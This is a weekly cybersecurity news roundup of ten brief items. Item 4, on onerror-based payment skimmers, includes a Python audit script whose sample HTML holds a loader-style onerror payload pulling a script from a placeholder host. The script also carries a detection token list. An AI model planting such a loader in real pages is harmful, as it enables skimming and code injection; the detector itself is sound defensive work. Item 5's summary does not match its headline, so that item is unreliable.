It's time for another CyberWednesday (Feb. 13-19). Cyber threats are evolving at a rapid pace, so keeping up is more important than ever. From attacks on artificial intelligence systems to the activities of state-sponsored hacking groups, no technology or organization is fully immune. Ransomware is becoming increasingly sophisticated, and security vulnerabilities are being ruthlessly exploited.
1. CISA Adds Palo Alto Networks and SonicWall Flaws to Exploited Vulnerabilities List
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security vulnerabilities affecting Palo Alto Networks PAN-OS and SonicWall SonicOS SSLVPN to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The first, CVE-2025-0108, is an authentication bypass flaw in the PAN-OS management web interface that allows unauthenticated attackers to invoke specific PHP scripts.
Palo Alto Networks has observed attempts to exploit this vulnerability in combination with others, such as CVE-2024-9474, to gain unauthorized access to unpatched firewalls. The second, CVE-2024-53704, is an improper authentication issue in SonicWall's SSLVPN, enabling remote attackers to bypass authentication. Following the release of a proof-of-concept by Bishop Fox, threat actors have been actively exploiting this flaw. CISA has mandated that Federal Civilian Executive Branch agencies address these vulnerabilities by March 11, 2025, to protect their networks. (Source: thehackernews.com)
2. Chinese Hackers Exploit MAVInject.exe to Evade Detection in Targeted Cyber Attacks
Chinese threat actors have leveraged the mavinject.exe tool to compromise targeted systems and bypass traditional security measures. The hackers utilize this executable to inject malicious code into trusted processes, making their operations more stealthy. Security researchers have observed that this tactic allows the threat group to maintain persistence and evade detection across various networks.
Investigations indicate that the exploitation of mavinject.exe is part of a broader campaign aimed at infiltrating sensitive environments. Experts warn that organizations must update their security protocols and patch vulnerabilities to mitigate such advanced threats. The evolving nature of these attacks underscores the importance of robust cybersecurity practices in defending against state-sponsored operations. (Source: thehackernews.com)
3. Debunking the AI Hype: Inside Real Hacker Tactics
The actual application of artificial intelligence in cyber security is more complicated than media reports suggest. While AI can support threat detection, it does not replace the need for human analysis and expert experience. Machine learning technologies support the analysis of large data sets, but still require oversight to avoid unexpected risks. Hackers are also using manipulation techniques, such as phishing, to gain access to systems whose security is not based solely on artificial intelligence.
There is a danger of dependence on this technology, which can lead to new security vulnerabilities as adversaries also adapt their methods. The need to strike a balance between innovation and traditional protection methods is crucial in the fight against modern threats. (Source: thehackernews.com)
4. Cybercriminals Exploit Onerror Event in Image Tags to Deploy Payment Skimmers
Cybercriminals use the onerror event in HTML to inject malicious code when resource loading errors occur. By manipulating this event, they can bypass traditional protection mechanisms and launch XSS attacks. This technique allows them to gain unauthorized access to data or make unwanted changes to online applications. The use of less obvious methods, such as onerror modification, makes the threat more difficult to detect. Proper validation and sanitization of data are essential to minimize the risk. Regular security updates are key in the fight against such attacks. (Source: thehackernews.com)
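As an added illustration (not code from the cited article), the following audit walks a page's HTML and reports every inline event handler on an image tag, raising severity when the handler looks like a loader rather than a fallback-image swap. The token list, the set of "always failing" src values and the sample markup are assumptions constructed for this example.

```python
from html.parser import HTMLParser

# Assumed heuristics (not from the article): tokens that suggest an inline
# handler loads or decodes further code instead of swapping a fallback image.
LOADER_TOKENS = ("eval(", "atob(", "function(", "createelement",
                 "fromcharcode", "fetch(")
# Assumed src values that can never resolve to an image, so onerror always fires.
DEAD_SRC = ("", "#", "x", "/")


class InlineHandlerAudit(HTMLParser):
    """Collect every inline on* handler found on <img> tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <IMG OnError=...> matches.
        if tag != "img":
            return
        attr_map = {name: (value or "") for name, value in attrs}
        src = attr_map.get("src", "").strip()
        for name, value in attr_map.items():
            if not name.startswith("on"):
                continue
            compact = "".join(value.lower().split())  # defeat spacing tricks
            reasons = []
            if name == "onerror" and src in DEAD_SRC:
                reasons.append("src guaranteed to fail")
            if any(tok in compact for tok in LOADER_TOKENS):
                reasons.append("handler builds or decodes code")
            self.findings.append({"line": self.getpos()[0], "attr": name,
                                  "severity": "high" if reasons else "review",
                                  "reasons": reasons})


def audit_img_handlers(html_text):
    parser = InlineHandlerAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample page: a benign fallback handler and a loader-style handler.
SAMPLE = """<html><body>
<img src="/static/logo.png" onerror="this.src='/static/fallback.png'">
<IMG SRC="x" OnError="var s=document.createElement('script');s.src='https://cdn.example.invalid/a.js';document.head.appendChild(s)">
<img src="/static/banner.png" alt="no handler">
</body></html>"""

if __name__ == "__main__":
    for finding in audit_img_handlers(SAMPLE):
        print(finding)
```

Running this over rendered checkout pages or stored template fragments gives a review list; a Content Security Policy that disallows inline handlers remains the stronger control.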
5. Microsoft: Russian-Linked Hackers Using 'Device Code Phishing' to Hijack Accounts
Microsoft has reported that Russian-linked hackers are using advanced techniques to break into company systems. Attackers are exploiting vulnerabilities in software, allowing them to escalate privileges and install malicious code. These methods bypass traditional security measures, increasing the risk of unauthorized access to sensitive data. Experts stress the need to quickly implement patches and strengthen security procedures.
Organizations are being warned of the growing risk of state cyberattacks. The incident underscores the importance of continuous threat monitoring and investment in modern protection solutions. (Source: thehackernews.com)
6. Call for action: urgent plan needed to transition to post-quantum cryptography together
Europol is calling for an urgent, comprehensive plan to transition to cryptography resistant to quantum attacks. With the rapid development of quantum computers, traditional encryption methods are becoming increasingly threatened. Cooperation between countries, industry and academia is crucial for a successful technological transition.
New standards aim to secure critical infrastructure and protect data in both the public and private sectors. Intensified research and rapid technology transfer are the cornerstones of efforts to maintain the highest level of digital security. (Source: europol.europa.eu)
7. New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake
A new wave of “scam yourself” attacks is becoming increasingly prominent in the digital environment. Cybercriminals are using sophisticated social engineering techniques to get victims to take actions that unwittingly harm their own interests. Information manipulation and false messages often make victims believe they are acting to their own advantage, when in fact they are being duped.
Such actions can lead to serious financial losses and leakage of confidential data. Experts stress that it is crucial to increase awareness of the risks and use advanced security measures to protect against such scams. (Source: cybersecuritynews.com)
8. How Cybersecurity is Fuelling Global IT and Tech Spend
Growing cyber threats are contributing to a rapid increase in global IT spending. Organizations are investing more and more resources in state-of-the-art protection systems to guard against increasingly sophisticated attacks. The increase in spending on cyber security is fueling the development of innovative tools and technologies to effectively counter threats.
Strengthening IT infrastructure is becoming a key component of companies' strategies to not only protect data, but also to remain competitive in the market. Experts predict that this trend will continue, transforming global IT budgets and accelerating digital transformation. Investment in digital security is seen as an indispensable step in building resilience against cyber attacks and supporting the continued growth of the technology sector. (Source: cybermagazine.com)
9. Firefox 135.0.1 Released with Fix for High-Severity Memory Safety Vulnerabilities
Mozilla has released Firefox update 135.0.1, which fixes critical security vulnerability CVE-2025-1414. The bug involved memory management during HTML content processing and could allow attackers to execute code remotely. In addition to security improvements, responsiveness issues with drop-down menus, scrolling errors related to anchor tags and crashes when restoring sessions have also been fixed. It is recommended that you update your browser immediately to avoid potential threats. (Source: cybersecuritynews.com)
10. Massive attacks on Europe. Poland's elections could be at risk?
The article looks at the surge in cyber attacks in Europe, with a focus on Poland. In 2024, the number of global cyberattacks increased by 44%, with organizations in the EMEA region experiencing an average of 1,679 attacks per week. Poland was among the top European countries with 1,644 attacks per week, with public, government and military sectors particularly vulnerable.
Check Point Software experts, at the CPX 2025 conference in Vienna, highlighted that Poland has been the target of nearly 100,000 hacking attacks since the Russian invasion of Ukraine in 2022. With Poland's upcoming parliamentary elections, there is a real threat of interference in the electoral process through cyberattacks and disinformation campaigns, which could affect the stability of the country's democratic processes. (Source: bussinesjournal.pl)
